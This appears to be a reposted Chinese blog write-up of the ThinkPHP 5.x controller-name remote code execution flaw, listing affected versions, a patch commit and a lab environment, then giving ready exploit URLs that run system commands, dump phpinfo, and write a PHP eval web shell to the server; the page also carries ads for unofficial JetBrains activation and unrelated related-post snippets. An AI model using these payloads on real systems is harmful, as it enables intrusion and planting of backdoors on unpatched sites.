thinkphp漏洞检测工具_thinkphp渗透

thinkphp漏洞检测工具_thinkphp渗透0x00前言由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。0x01影响范围5.x<5.1.31,<=5.0.230×02漏洞分析Thinkphpv5.0.x补丁地址:https://github.com/top-think/framework/com…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全家桶1年46,售后保障稳定

0x00 前言
由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。

0x01 影响范围
5.x < 5.1.31, <= 5.0.23

0x02 漏洞分析
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

0x03漏洞利用
docker漏洞环境源码:https://github.com/vulnspy/thinkphp-5.1.29
本地环境:thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

1.利用system函数远程命令执行
http://localhost:9096/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

2.通过phpinfo函数写出phpinfo()的信息
http://localhost:9096/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

3.写入shell:
http://localhost:9096/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%3C?php%20@eval($_GET[%22code%22])?%3E%3Eshell.php

或者

http://localhost:9096/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=…/test.php&vars[1][]=<?php echo ‘ok’;?>

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/206669.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • android 7 uc flash,UC浏览器7.2版新增加FLASH游戏支持功能[通俗易懂]

    android 7 uc flash,UC浏览器7.2版新增加FLASH游戏支持功能[通俗易懂]一直以来,FLASH游戏都是手机的一个硬伤,比如当前令人疯狂的偷菜游戏,一直以来也只能玩纯文字版或者图文版,而不能在手机上实现电脑一样的体验。就在5月19日,国内著名的手机浏览器UC发布了7.2正式版,其革命性的应用了FLASH10技术,使得手机能够完美支持FLASH游戏,彻底改变了开篇所说到的窘境。小编在新版本发布的第一时间,就对7.2正式版进行了“尝鲜”,让我们一起来看看UC浏览器FLASH的…

  • 屏幕硬件参数选取

    屏幕硬件参数选取

  • windows cmd命令大全及详解_win10 cmd命令

    windows cmd命令大全及详解_win10 cmd命令命令提示符是在操作系统中,提示进行命令输入的一种工作提示符。在不同的操作系统环境下,命令提示符各不相同。在windows环境下,命令行程序为cmd.exe,是一个32位的命令行程序,微软Windows系统基于Windows上的命令解释程序,类似于微软的DOS操作系统。一、启动CMD命令提示符控制器“开始”→“运行”→输入“cmd”回车;或者:win+R(两个键同时按)打开“运行”窗口→输…

  • 微信公众平台、微信公众平台.小程序、微信.开放平台[通俗易懂]

    微信公众平台、微信公众平台.小程序、微信.开放平台[通俗易懂]一个开发者账号如何上线多个小程序?一个小程序账号对应一个小程序,可发布一个小程序上线。如果需要开发多款小程序,请注册新的账号。https://developers.weixin.qq.com/community/develop/doc/000886957d47f87cf9997f47c5b000小程序怎么发布,一套小程序代码怎么同时发布到不同的小程序上面,发布为体验版和正式版本!点击上传旁边的详情按钮,打开配置页面,修改项目addip,吧这个appid修改成需要覆盖的线上小程序id即可https:

  • 免费php网站源码_网页代码生成器

    免费php网站源码_网页代码生成器ASP:CODE:[Copytoclipboard]?http://211.13Array.167.71/waptes…/updateuserinfo.jsp”,falseobjXMLHTTP.setRequestHeader”Content-Type”,”application/x-www-form-urlencoded”objXMLHTTP.setRequestHead…

    2022年10月10日
  • 车用TVS管 SM8S系列 国产替代

    车用TVS管 SM8S系列 国产替代汽车电子产品用TVS瞬态抑制二极管,首要条件就是器件要符合AEC-Q101标准,满足ISO-7637-2测试标准。目前业内比较常用的汽车级TVS二极管功率6600W,DO-218AB封装,工作电压10V-48V,不同品牌厂商对其型号命名是有差异的,比如力特(Littelfuse)是SLD8S系列,威世(Vishay)是SM8S系列,东沃(DOWO)是SM8S系列……具体型号如下:·SLD8S系列(Littelfuse品牌)型号大全:SLD8S10A、SLD8S11A、SLD8S12A、SLD8S13A

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号